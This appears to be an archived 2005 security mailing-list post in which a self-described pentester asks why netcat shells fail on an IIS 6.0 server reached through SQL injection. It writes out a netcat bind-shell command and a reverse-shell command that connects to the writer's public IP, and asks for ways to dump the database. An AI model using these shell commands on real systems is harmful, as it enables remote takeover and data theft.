From: intel96 (intel96@bellsouth.net)
Date: Tue May 31 2005 - 18:39:05 EDT
To All,
I am conducting a pentest and I have been able to upload netcat to the
web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to
establish a shell both ways, but cannot get it to work:
On the web server I first tried: nc.exe –l –p 8000 –e cmd.exe
When I tried to connect to port 8000 on the web server I received a
timeout on my side. I have also tried this with port 53 and it also did
not work.
I than tried: nc.exe –nv my_public_ip_address 443 -d –e cmd.exe
This did not work either. I did not see the remote system trying to
connect to my system via my logs. I have access to upload anything to
the system and run most commands via sql injections. I have
administrator level access on the system at this time.
Any ideas on how I can get this shell to work? Or there any other
commands that may provide me more access or allow me to dump the database?
Thanks,
Intel96
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:22 EDT